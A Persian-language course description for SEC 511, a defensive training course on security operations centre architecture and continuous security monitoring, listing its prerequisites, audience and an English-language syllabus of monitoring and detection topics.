دوره SEC 511

در پیاده سازی مراکز عملیات امنیت زیرساخت ها و آماده سازی آنها یکی از مراحل حیاتی است. در این دوره می آموزیم که یک معماری قابل دفاع و مورد نیاز یک مرکز عملیات امنیت (SOC) چگونه است و چه سنسورهایی باید لحاظ شود و چه تجهیزاتی باید در چه محل هایی بکار رود . همچنین می آموزیم چطور به صورت موثر در سطح شبکه و در سطح نقات پایانی کلاینت و سرور پایش را به نحو موثر انجام دهیم. یاد می گیریم چگونه ترافیک های مختلف را تحلیل کرده و آر تی فکت ها را از نقاط پایانی استخراج کنیم و در نهایت این که چطور بد افزار ها را از ترافیک های رمز شده بیرون بکشیم و روش های اتوماتیک کردن پایش امنیت را می آموزیم.

پیش نیاز های دوره

مخاطبین دوره

  • SEC 504
  • تسلط بالا بر مفاهیم TCP/IP و لایه های شبکه
  • کارشناسان امنیت
  • کارشناسان واحد پاسخگویی به حوادث
  • کارشناسان واحد مرکز عملیات امنیت

سرفصل دوره

  • Traditional Security Architecture
  • Perimeter-focused
  • Addressed Layer 3/4
  • Centralized Information Systems
  • Prevention-Oriented
  • Device-driven
  • Traditional Attack Techniques
  • Modern Security Architecture Principles
  • Detection-oriented
  • Post-Exploitation-focused
  • Decentralized Information Systems/Data
  • Risk-informed
  • Layer 7 Aware
  • Security Operations Centers
  • Network Security Monitoring
  • Continuous Security Monitoring
  • Modern Attack Techniques
  • Adversarial Dominance
  • Frameworks and Enterprise Security Architecture
  • Enterprise Security Architecture
  • Security Frameworks
  • Security Architecture – Key Techniques/Practices
  • Threat Vector Analysis
  • Data Exfiltration Analysis
  • Detection Dominant Design
  • Intrusion Kill Chain
  • Visibility Analysis
  • Data Visualization
  • Lateral Movement Analysis
  • Data Ingress/Egress Mapping
  • Internal Segmentation
  • Network Security Monitoring
  • Continuous Security Monitoring
  • Security Operations Center (SOC)
  • Purpose of a SOC
  • Key SOC roles
  • Relationship to Defensible Security Architecture

SOCs/Security Architecture – Key Infrastructure Devices

Traditional and Next- Generation Firewalls, and NIPS

Web Application Firewall

Malware Detonation Devices

HTTP Proxies, Web Content Filtering, and SSL/TLS Decryption

SIEMs, NIDS, Packet Captures, and DLP

Honeypots/Honeynets

Network Infrastructure – Routers, Switches, DHCP, DNS

Mobile Devices and Wireless Access Points

Threat Intelligence

Segmented Internal Networks

Routers

Internal SI Firewalls

VLANs

Detecting the Pivot

DNS architecture

Encrypted DNS including DNS over HTTPS (DoH) and DNS over TLS (DoT)

Defensible Network Security Architecture Principles Applied

Internal Segmentation

Threat Vector Analysis

Data Exfiltration Analysis

Detection Dominant Design

Zero Trust Model (Kindervag)

Intrusion Kill Chain

Visibility Analysis

Data Visualization

Lateral Movement Analysis

Data Ingress/Egress Mapping

Continuous Monitoring Overview

Defined

Network Security Monitoring (NSM)

Continuous Security Monitoring (CSM)

Continuous Monitoring and the 20 Critical Security Controls

Network Security Monitoring (NSM)

Evolution of NSM

The NSM Toolbox

NIDS Design

Analysis Methodology

Understanding Data Sources

Full Packet Capture

Extracted Data

String Data

Flow Data

Transaction Data

Statistical Data

Alert Data

Tagged Data

Correlated Data

Cloud NSM

Practical NSM Issues

Cornerstone NSM

Service-Side and Client-Side Exploits

Identifying High-Entropy Strings

Tracking EXE Transfers

Identifying Command and Control (C2) Traffic

Tracking User Agents

C2 via HTTPS

Tracking Encryption Certificates

Security Architecture – Endpoint Protection

Anti-Malware

Host-based Firewall, Host-based IDS/IPS

Application Control, Application Virtualization

Privileged Accounts, Authentication, Monitoring, and UAC

Virtual Desktop Infrastructure

Browser Security

EMET and Defender Exploit Guard

Patching

Process

To Test or Not to Test

Microsoft

Third-Party

  • Overview
    • Continuous Security Monitoring (CSM) vs. Continuous Diagnostics and Mitigation (CDM) vs. Information Security Continuous Monitoring (ISCM)
    • Cyberscope and SCAP
  • Industry Best Practices
    • Continuous Monitoring and the 20 CIS Critical Security Controls
    • Australian Signals Directorate (ASD) Strategies to Mitigate Targeted Cyber Intrusions
  • Winning CSM Techniques
  • Maintaining Situational Awareness
  • Host, Port, and Service Discovery
  • Vulnerability Scanning
  • Monitoring Patching
  • Monitoring Applications
  • Monitoring Service Logs

    • Detecting Malware via DNS logs
  • Monitoring Change to Devices and Appliances
  • Leveraging Proxy and Firewall Data
  • Configuring Centralized Windows Event Log Collection
  • Monitoring Critical Windows Events

    • Hands-on: Detecting Malware via Windows Event Logs
  • Scripting and Automation
    • Importance of Automation
    • PowerShell
    • DeepBlueCLI
    • Hands-on: Detecting Malicious Registry Run Keys with PowerShell